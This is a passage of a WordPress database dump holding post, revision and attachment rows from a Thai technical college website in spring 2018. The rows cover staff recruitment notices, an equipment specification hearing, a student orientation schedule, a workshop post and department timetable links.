(1979, 3, '2018-03-29 13:37:05', '2018-03-29 06:37:05', '', '29-3-2561 13-35-41', '', 'inherit', 'closed', 'closed', '', '29-3-2561-13-35-41', '', '', '2018-03-29 13:37:05', '2018-03-29 06:37:05', '', 1976, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/29-3-2561-13-35-41.jpg', 0, 'attachment', 'image/jpeg', 0),
(1980, 3, '2018-03-29 13:37:07', '2018-03-29 06:37:07', '', '29-3-2561 13-36-15', '', 'inherit', 'closed', 'closed', '', '29-3-2561-13-36-15', '', '', '2018-03-29 13:37:07', '2018-03-29 06:37:07', '', 1976, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/29-3-2561-13-36-15.jpg', 0, 'attachment', 'image/jpeg', 0),
(1981, 3, '2018-03-29 13:38:19', '2018-03-29 06:38:19', '<img class=\"aligncenter wp-image-1978 size-full\" src=\"/wp-content/uploads/2018/03/22-3-2561-16-33-39.jpg\" alt=\"\" width=\"195\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1977\" src=\"/wp-content/uploads/2018/03/22-3-2561-16-31-27-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1979 size-full\" src=\"/wp-content/uploads/2018/03/29-3-2561-13-35-41.jpg\" alt=\"\" width=\"951\" height=\"629\" />\r\n\r\n<img class=\"aligncenter wp-image-1980 size-full\" src=\"/wp-content/uploads/2018/03/29-3-2561-13-36-15.jpg\" alt=\"\" width=\"948\" height=\"612\" />', 'ช่างเชื่อม', '', 'inherit', 'closed', 'closed', '', '1976-revision-v1', '', '', '2018-03-29 13:38:19', '2018-03-29 06:38:19', '', 1976, 'http://www.technicrayong.ac.th/1976-revision-v1/', 0, 'revision', '', 0),
(1986, 3, '2018-04-02 11:38:59', '2018-04-02 04:38:59', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครครูอัตราจ้าง จำนวน 8 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%b2', '', '', '2018-04-02 11:38:59', '2018-04-02 04:38:59', '', 0, 'http://www.technicrayong.ac.th/?p=1986', 438, 'post', '', 0),
(1987, 3, '2018-04-02 11:38:34', '2018-04-02 04:38:34', '', 'รับสมัครคัดเลือกครูอัตราจ้าง', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%ad%e0%b8%b1%e0%b8%95', '', '', '2018-04-02 11:38:34', '2018-04-02 04:38:34', '', 1986, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/04/รับสมัครคัดเลือกครูอัตราจ้าง.pdf', 0, 'attachment', 'application/pdf', 0),
(1988, 3, '2018-04-02 11:38:59', '2018-04-02 04:38:59', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครครูอัตราจ้าง จำนวน 8 อัตรา', '', 'inherit', 'closed', 'closed', '', '1986-revision-v1', '', '', '2018-04-02 11:38:59', '2018-04-02 04:38:59', '', 1986, 'http://www.technicrayong.ac.th/1986-revision-v1/', 0, 'revision', '', 0),
(1990, 3, '2018-04-02 14:50:54', '2018-04-02 07:50:54', '', 'ประชาพิจารณ์รายละเอียดร่างคุณลักษณะครุภัณฑ์ 1 รายการ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%9e%e0%b8%b4%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b9%8c%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%a5%e0%b8%b0%e0%b9%80%e0%b8%ad%e0%b8%b5%e0%b8%a2%e0%b8%94-3', '', '', '2018-04-02 14:50:54', '2018-04-02 07:50:54', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/04/ประชาพิจารณ์รายละเอียดร่างคุณลักษณะครุภัณฑ์-1-รายการ.pdf', 0, 'attachment', 'application/pdf', 0),
(1997, 3, '2018-04-05 13:25:14', '2018-04-05 06:25:14', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%B4%E0%B8%88%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%A5%E0%B8%B0%E0%B9%80%E0%B8%AD%E0%B8%B5%E0%B8%A2%E0%B8%94%E0%B8%A3%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B8%B0-1-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3-5%E0%B9%80%E0%B8%A1%E0%B8%A2.61.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์ จำนวน 1 รายการ ประจำปีงบประมาณ 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%9e%e0%b8%b4%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b9%8c%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%a5', '', '', '2018-04-05 13:25:14', '2018-04-05 06:25:14', '', 0, 'http://www.technicrayong.ac.th/?p=1997', 437, 'post', '', 0),
(1998, 3, '2018-04-05 13:24:55', '2018-04-05 06:24:55', '', 'ประชาพิจารณ์รายละเอียดร่างคุณลักษณะ 1 รายการ 5เมย.61', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%9e%e0%b8%b4%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b9%8c%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%a5%e0%b8%b0%e0%b9%80%e0%b8%ad%e0%b8%b5%e0%b8%a2%e0%b8%94-4', '', '', '2018-04-05 13:24:55', '2018-04-05 06:24:55', '', 1997, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/04/ประชาพิจารณ์รายละเอียดร่างคุณลักษณะ-1-รายการ-5เมย.61.pdf', 0, 'attachment', 'application/pdf', 0),
(1999, 3, '2018-04-05 13:25:14', '2018-04-05 06:25:14', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%B4%E0%B8%88%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%A5%E0%B8%B0%E0%B9%80%E0%B8%AD%E0%B8%B5%E0%B8%A2%E0%B8%94%E0%B8%A3%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B8%B0-1-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3-5%E0%B9%80%E0%B8%A1%E0%B8%A2.61.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์ จำนวน 1 รายการ ประจำปีงบประมาณ 2561', '', 'inherit', 'closed', 'closed', '', '1997-revision-v1', '', '', '2018-04-05 13:25:14', '2018-04-05 06:25:14', '', 1997, 'http://www.technicrayong.ac.th/1997-revision-v1/', 0, 'revision', '', 0),
(2000, 3, '2018-04-05 13:38:18', '2018-04-05 06:38:18', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D565528250490034%26id%3D100010985913485&width=500\" width=\"500\" height=\"757\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการอบรมเชิงปฏิบัติการ \"พัฒนาศักยภาพรองผู้อำนวยการและหัวหน้างานอาชีวศึกษาระบบทวิภาคี สถานศึกษาต้นแบบ\" สถานศึกษาอาชีวศึกษาภาคกลาง ภาคตะวันออกและกรุงเทพมหานคร ระหว่างวันที่ 2-4 เมษายน 2561 ณ ห้องประชุมชมทะเล โรงแรมเมาท์เทนบีช พัทยา จังหวัดชลบุรี', '', 'publish', 'closed', 'open', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%87%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4', '', '', '2018-04-05 13:38:36', '2018-04-05 06:38:36', '', 0, 'http://www.technicrayong.ac.th/?p=2000', 436, 'post', '', 0),
(2001, 3, '2018-04-05 13:37:54', '2018-04-05 06:37:54', '', '29745047_565524713823721_5828249132375060180_o', '', 'inherit', 'closed', 'closed', '', '29745047_565524713823721_5828249132375060180_o', '', '', '2018-04-05 13:37:54', '2018-04-05 06:37:54', '', 2000, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/04/29745047_565524713823721_5828249132375060180_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2002, 3, '2018-04-05 13:38:18', '2018-04-05 06:38:18', '<p style=\"text-align: center;\"></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D565528250490034%26id%3D100010985913485&width=500\" width=\"500\" height=\"757\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการอบรมเชิงปฏิบัติการ \"พัฒนาศักยภาพรองผู้อำนวยการและหัวหน้างานอาชีวศึกษาระบบทวิภาคี สถานศึกษาต้นแบบ\" สถานศึกษาอาชีวศึกษาภาคกลาง ภาคตะวันออกและกรุงเทพมหานคร ระหว่างวันที่ 2-4 เมษายน 2561 ณ ห้องประชุมชมทะเล โรงแรมเมาท์เทนบีช พัทยา จังหวัดชลบุรี', '', 'inherit', 'closed', 'closed', '', '2000-revision-v1', '', '', '2018-04-05 13:38:18', '2018-04-05 06:38:18', '', 2000, 'http://www.technicrayong.ac.th/2000-revision-v1/', 0, 'revision', '', 0),
(2003, 3, '2018-04-05 13:38:36', '2018-04-05 06:38:36', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D565528250490034%26id%3D100010985913485&width=500\" width=\"500\" height=\"757\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการอบรมเชิงปฏิบัติการ \"พัฒนาศักยภาพรองผู้อำนวยการและหัวหน้างานอาชีวศึกษาระบบทวิภาคี สถานศึกษาต้นแบบ\" สถานศึกษาอาชีวศึกษาภาคกลาง ภาคตะวันออกและกรุงเทพมหานคร ระหว่างวันที่ 2-4 เมษายน 2561 ณ ห้องประชุมชมทะเล โรงแรมเมาท์เทนบีช พัทยา จังหวัดชลบุรี', '', 'inherit', 'closed', 'closed', '', '2000-revision-v1', '', '', '2018-04-05 13:38:36', '2018-04-05 06:38:36', '', 2000, 'http://www.technicrayong.ac.th/2000-revision-v1/', 0, 'revision', '', 0),
(2005, 4, '2018-04-12 15:04:20', '2018-04-12 08:04:20', '', 'ปต', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%95', '', '', '2018-04-12 15:04:20', '2018-04-12 08:04:20', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/04/ปต.pdf', 0, 'attachment', 'application/pdf', 0),
(2006, 4, '2018-04-12 15:05:10', '2018-04-12 08:05:10', '', 'central lab', '', 'inherit', 'closed', 'closed', '', 'central-lab', '', '', '2018-04-12 15:05:10', '2018-04-12 08:05:10', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/04/central-lab.pdf', 0, 'attachment', 'application/pdf', 0),
(2008, 4, '2018-04-12 15:23:16', '2018-04-12 08:23:16', '<pre><em><strong>ประเภทวิชาช่างอุตสาหกรรม</strong></em></pre>\r\n<a href=\"https://drive.google.com/open?id=1GJeVA_9IG7ZMTqnSEuYspAdaBInGrd92\">แผนกวิชาช่างยนต์</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/18DUT5UrL5Crhyxk6elmUBDtZ3rEVUv17/view?usp=sharing\">แผนกวิชาช่างกลโรงงาน</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1Lr5wDUFZraXwkOhvKPo6y1j8cEAvyGDa\">แผนกวิชาช่างเชื่อมโลหะ</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/1_KrktkkOuwWugXI7ix4Ml2qiSo_S_aMt/view?usp=sharing\">แผนกวิชาช่างไฟฟ้ากำลัง</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/1RZ-NvZ0HW_rafKtRT8dU-moR1eYrgbzv/view?usp=sharing\">แผนกวิชาช่างอิเล็กทรอนิกส์</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1y8_cTzXqOkaSdsbBY6YG6m-LBtsixd6K\">แผนกวิชาช่างก่อสร้าง</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/10R1gr7o9Z85Tikm0RbgfcIexgJ05w0kz/view?usp=sharing\">แผนกวิชาเครื่องมือวัดและควบคุม</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/1UehVc3kQSCwR-0iU_DrjBuwM8lENcqTF/view?usp=sharing\">แผนกวิชาปิโตรเคมี</a>\r\n\r\n \r\n\r\n<a href=\"https://drive.google.com/file/d/1hqpE9soBZwLB23hLXq_4qOJuBo15ESmg/view?usp=sharing\">แผนกวิชาเคมีอุตสาหกรรม</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1tHljRJg-vC8NKByW9O9Hw9v5RK0_XojQ\">แผนกวิชาเทคโนโลยียาง</a>', 'ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-04-12 15:23:16', '2018-04-12 08:23:16', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(2009, 4, '2018-04-12 15:24:28', '2018-04-12 08:24:28', '<pre><em><strong>ประเภทวิชาช่างอุตสาหกรรม</strong></em></pre>\r\n<a href=\"https://drive.google.com/open?id=1GJeVA_9IG7ZMTqnSEuYspAdaBInGrd92\">แผนกวิชาช่างยนต์</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/18DUT5UrL5Crhyxk6elmUBDtZ3rEVUv17/view?usp=sharing\">แผนกวิชาช่างกลโรงงาน</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1Lr5wDUFZraXwkOhvKPo6y1j8cEAvyGDa\">แผนกวิชาช่างเชื่อมโลหะ</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/1_KrktkkOuwWugXI7ix4Ml2qiSo_S_aMt/view?usp=sharing\">แผนกวิชาช่างไฟฟ้ากำลัง</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/1RZ-NvZ0HW_rafKtRT8dU-moR1eYrgbzv/view?usp=sharing\">แผนกวิชาช่างอิเล็กทรอนิกส์</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1y8_cTzXqOkaSdsbBY6YG6m-LBtsixd6K\">แผนกวิชาช่างก่อสร้าง</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/10R1gr7o9Z85Tikm0RbgfcIexgJ05w0kz/view?usp=sharing\">แผนกวิชาเครื่องมือวัดและควบคุม</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/1UehVc3kQSCwR-0iU_DrjBuwM8lENcqTF/view?usp=sharing\">แผนกวิชาปิโตรเคมี</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/1hqpE9soBZwLB23hLXq_4qOJuBo15ESmg/view?usp=sharing\">แผนกวิชาเคมีอุตสาหกรรม</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1tHljRJg-vC8NKByW9O9Hw9v5RK0_XojQ\">แผนกวิชาเทคโนโลยียาง</a>', 'ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-04-12 15:24:28', '2018-04-12 08:24:28', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(2011, 3, '2018-04-25 08:57:19', '2018-04-25 01:57:19', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%81%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%90%E0%B8%A1%E0%B8%99%E0%B8%B4%E0%B9%80%E0%B8%97%E0%B8%A8.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ กำหนดการโครงการอบรมคุณธรรมจริยธรรม และปฐมนิเทศนักเรียน นักศึกษาใหม่ ประจำปีการศึกษา 2561 ระหว่างวันที่ 1-5 พฤษภาคม 2561 และ 7-11 พฤษภาคม 2561 ณ วัดมาบตาพุด ต.มาบตาพุด อ.เมือง จ.ระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%81%e0%b8%b3%e0%b8%ab%e0%b8%99%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad', '', '', '2018-04-25 08:58:24', '2018-04-25 01:58:24', '', 0, 'http://www.technicrayong.ac.th/?p=2011', 435, 'post', '', 0),
(2012, 3, '2018-04-25 08:57:05', '2018-04-25 01:57:05', '', 'กำหนดการปฐมนิเทศ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b3%e0%b8%ab%e0%b8%99%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%90%e0%b8%a1%e0%b8%99%e0%b8%b4%e0%b9%80%e0%b8%97%e0%b8%a8', '', '', '2018-04-25 08:57:05', '2018-04-25 01:57:05', '', 2011, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/04/กำหนดการปฐมนิเทศ.pdf', 0, 'attachment', 'application/pdf', 0),
(2013, 3, '2018-04-25 08:57:19', '2018-04-25 01:57:19', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%81%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%90%E0%B8%A1%E0%B8%99%E0%B8%B4%E0%B9%80%E0%B8%97%E0%B8%A8.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ กำหนดการโครงการอบรมคุณธรรมจริยธรรม และปฐมนิเทศนักเรียน นักศึกษาใหม่ ประจำปีการศึกษา 2561 ระหว่างวันที่ 1-5 พฤาภาคม 2561 และ 7-11 พฤษภาคม 2561 ณ วัดมาบตาพุด ต.มาบตาพุด อ.เมือง จ.ระยอง', '', 'inherit', 'closed', 'closed', '', '2011-revision-v1', '', '', '2018-04-25 08:57:19', '2018-04-25 01:57:19', '', 2011, 'http://www.technicrayong.ac.th/2011-revision-v1/', 0, 'revision', '', 0),
(2014, 3, '2018-04-25 08:58:24', '2018-04-25 01:58:24', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%81%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%90%E0%B8%A1%E0%B8%99%E0%B8%B4%E0%B9%80%E0%B8%97%E0%B8%A8.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ กำหนดการโครงการอบรมคุณธรรมจริยธรรม และปฐมนิเทศนักเรียน นักศึกษาใหม่ ประจำปีการศึกษา 2561 ระหว่างวันที่ 1-5 พฤษภาคม 2561 และ 7-11 พฤษภาคม 2561 ณ วัดมาบตาพุด ต.มาบตาพุด อ.เมือง จ.ระยอง', '', 'inherit', 'closed', 'closed', '', '2011-revision-v1', '', '', '2018-04-25 08:58:24', '2018-04-25 01:58:24', '', 2011, 'http://www.technicrayong.ac.th/2011-revision-v1/', 0, 'revision', '', 0),
(2015, 3, '2018-04-25 15:07:26', '2018-04-25 08:07:26', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3-%E0%B8%88%E0%B8%99%E0%B8%97-%E0%B8%A7%E0%B8%B4%E0%B8%97%E0%B8%A2%E0%B8%9A%E0%B8%A3%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว เจ้าหน้าที่งานวิทยบริการ (งานศูนย์การเรียนรู้ภาษาอังกฤษด้วยตนเอง) จำนวน 1 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad-3', '', '', '2018-04-25 15:07:26', '2018-04-25 08:07:26', '', 0, 'http://www.technicrayong.ac.th/?p=2015', 434, 'post', '', 0),
(2016, 3, '2018-04-25 15:07:12', '2018-04-25 08:07:12', '', 'รับสมัคร จนท วิทยบริการ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3-%e0%b8%88%e0%b8%99%e0%b8%97-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-04-25 15:07:12', '2018-04-25 08:07:12', '', 2015, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/04/รับสมัคร-จนท-วิทยบริการ.pdf', 0, 'attachment', 'application/pdf', 0),
(2017, 3, '2018-04-25 15:07:26', '2018-04-25 08:07:26', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3-%E0%B8%88%E0%B8%99%E0%B8%97-%E0%B8%A7%E0%B8%B4%E0%B8%97%E0%B8%A2%E0%B8%9A%E0%B8%A3%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว เจ้าหน้าที่งานวิทยบริการ (งานศูนย์การเรียนรู้ภาษาอังกฤษด้วยตนเอง) จำนวน 1 อัตรา', '', 'inherit', 'closed', 'closed', '', '2015-revision-v1', '', '', '2018-04-25 15:07:26', '2018-04-25 08:07:26', '', 2015, 'http://www.technicrayong.ac.th/2015-revision-v1/', 0, 'revision', '', 0),
(2018, 3, '2018-04-25 15:11:27', '2018-04-25 08:11:27', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ครูอัตราจ้าง สาขาวิชาช่างก่อสร้าง จำนวน 1 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad-4', '', '', '2018-04-25 15:11:27', '2018-04-25 08:11:27', '', 0, 'http://www.technicrayong.ac.th/?p=2018', 433, 'post', '', 0),
(2019, 3, '2018-04-25 15:11:04', '2018-04-25 08:11:04', '', 'รับสมัคร ครูอัตราจ้าง ก่อสร้าง', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3-%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%87-%e0%b8%81%e0%b9%88', '', '', '2018-04-25 15:11:04', '2018-04-25 08:11:04', '', 2018, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/04/รับสมัคร-ครูอัตราจ้าง-ก่อสร้าง.pdf', 0, 'attachment', 'application/pdf', 0),
(2020, 3, '2018-04-25 15:11:27', '2018-04-25 08:11:27', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F04%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ครูอัตราจ้าง สาขาวิชาช่างก่อสร้าง จำนวน 1 อัตรา', '', 'inherit', 'closed', 'closed', '', '2018-revision-v1', '', '', '2018-04-25 15:11:27', '2018-04-25 08:11:27', '', 2018, 'http://www.technicrayong.ac.th/2018-revision-v1/', 0, 'revision', '', 0),
